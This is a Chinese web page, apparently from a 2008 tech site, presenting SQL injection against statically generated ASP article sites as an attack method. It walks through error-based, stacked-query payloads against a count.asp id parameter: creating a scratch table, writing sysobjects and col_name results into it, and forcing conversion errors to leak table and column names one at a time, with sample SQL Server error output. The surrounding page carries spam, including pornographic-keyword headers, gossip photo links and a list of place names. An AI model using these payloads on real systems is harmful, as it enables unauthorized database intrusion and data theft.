亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费

登錄論壇 | 注冊(cè)會(huì)員 設(shè)為首頁(yè) | 收藏本站
當(dāng)前位置 : 首頁(yè)>軟件學(xué)院>數(shù)據(jù)庫(kù)>SQL>正文
 
SQL腳本注入的不常見(jiàn)方法概括
http://m.yibo1263.com 2008/7/27 7:26:38  來(lái)源:本站  編輯:葉子
 
  大家在是否碰到過(guò)這樣的站點(diǎn):

  全站文章系統(tǒng)采用FSO靜態(tài)生成的HTML文件來(lái)顯示。這樣做的好處一來(lái)可以減輕服務(wù)器負(fù)擔(dān),提高訪問(wèn)速度。二來(lái)也阻止了SQL注入式的攻擊。。

  我來(lái)說(shuō)說(shuō)他們的文章系統(tǒng)原理:全部文章均在數(shù)據(jù)庫(kù)存有一個(gè)副本。另處根據(jù)模板生成一個(gè)HTML頁(yè)面。

  攻擊方法:

  查看源文件/看里面是否有通過(guò)JS來(lái)調(diào)用的頁(yè)面。

  如調(diào)用來(lái)更新文章的瀏覽次數(shù)。

  我們就可以這樣來(lái)試一下可否注入:

  http://服務(wù)器域名/count.asp?id=1552’

  看一下是否出錯(cuò)。如出錯(cuò)說(shuō)明有注入漏洞。然后正常攻擊。

  在本機(jī)建立一下post.htm的文件和log.txt的文本文件(用來(lái)記錄用,這是一個(gè)好習(xí)慣)

  post.htm內(nèi)容:主要是方便輸入。

  對(duì)于SQLSERVER的服務(wù)器可以這樣判斷:在1552后加一分號(hào),如正常有可能是SQLSERVER

  對(duì)于這類(lèi)數(shù)據(jù)庫(kù)可以先建一個(gè)表id=1552;create table aaa(aaa char(20));--

  然后插入一條記錄:id=1552;insert into aaa values(’test’);--

  再之后枚舉出他的數(shù)據(jù)表名:

  id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);--

  這是將第一個(gè)表名更新到aaa的字段處。

  id=1552 and exists(select * from aaa where aaa>5)就會(huì)報(bào)錯(cuò),多數(shù)情況會(huì)將表名直接讀出:看:

  Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ’80040e07’

  將 varchar 值 ’vote’ 轉(zhuǎn)換為數(shù)據(jù)類(lèi)型為 int 的列時(shí)發(fā)生語(yǔ)法錯(cuò)誤。

  /search.asp,行21

  其中vote就是表名:

  也可以先猜出一個(gè)表名,再把(select top 1 name from sysobjects where xtype=’u’ and status>0)的值更新到那個(gè)表的一條記錄中去。通過(guò)網(wǎng)頁(yè)顯示。

  讀出第一個(gè)表,第二個(gè)表可以這樣讀出來(lái)(在條件后加上 and name<>’剛才得到的表名’)。

  id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0 and name<>’vote’);--

  然后id=1552 and exists(select * from aaa where aaa>5)

  讀出第二個(gè)表,^^^^^^一個(gè)個(gè)的讀出,直到?jīng)]有為止。

  讀字段是這樣:

  id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),1));--

  然后id=1552 and exists(select * from aaa where aaa>5)出錯(cuò),得到字段名

  id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),2));--

  然后id=1552 and exists(select * from aaa where aaa>5)出錯(cuò),得到字段名

  ……類(lèi)推
收藏】【打印】【進(jìn)入論壇
  相關(guān)文章:

 
 
 
最新文章

搶先蘋(píng)果,消息稱英特爾芯片采用臺(tái)積電
三星揭曉業(yè)內(nèi)首款單條 512GB DDR5 內(nèi)存
vivo 高端新機(jī)爆料:120Hz 曲面屏 + 天
vivo Y21 在印度正式上市:Helio P35 芯
微星推出 GeForce RTX 3080 Sea Hawk X
消息稱三星 Galaxy Tab S8 系列平板將放
機(jī)械革命推出 F6 輕薄本:16 英寸全面屏
英特爾 12 代 Alder Lake CPU 600 系列
雷軍:向小米手機(jī) 1 首批用戶每人贈(zèng)送價(jià)
小米李明談?dòng)脩舯惶叱?nbsp;MIUI 測(cè)試版:大

推薦文章
1
2
3
4
5
6
7
8
9
10
叛逆嫩模性感寫(xiě)真
宮如敏不雅照瘋傳 看張馨予韓一菲獸獸誰(shuí)
不懼孔子搶位 阿凡達(dá)游戲影音配置推薦
2015第十七屆“東北安博會(huì)”火爆招商
第十六屆東北國(guó)際公共安全防范產(chǎn)品博覽
2016年第五屆中國(guó)國(guó)際商業(yè)信息化博覽會(huì)
2016年第五屆中國(guó)國(guó)際POS機(jī)及相關(guān)設(shè)備展
互聯(lián)網(wǎng)電視熟了嗎 2013最火電視深解析
桑達(dá)獲邀出席2015中國(guó)(廣州)國(guó)際POS機(jī)
寶獲利報(bào)名參加“2015年度中國(guó)POS機(jī)行業(yè)
八卦圖解 More>>
叛逆嫩模性感寫(xiě)真 宮如敏不雅照瘋傳 看張馨予韓一菲
周偉童魔鬼身材日本性感寫(xiě)真圖  聯(lián)想V360筆記本模特寫(xiě)真
常德市| 公主岭市| 庆元县| 将乐县| 江北区| 尉氏县| 临洮县| 宿松县| 吉隆县| 额济纳旗| 台湾省| 岚皋县| 和硕县| 左云县| 景东| 桐乡市| 孟村| 元谋县| 定西市| 澄城县| 临猗县| 贺兰县| 绥阳县| 襄垣县| 图片| 泸溪县| 奇台县| 稻城县| 海口市| 桐城市| 托克逊县| 腾冲县| 阳春市| 敦煌市| 中卫市| 利津县| 页游| 和林格尔县| 旺苍县| 灵宝市| 泰顺县|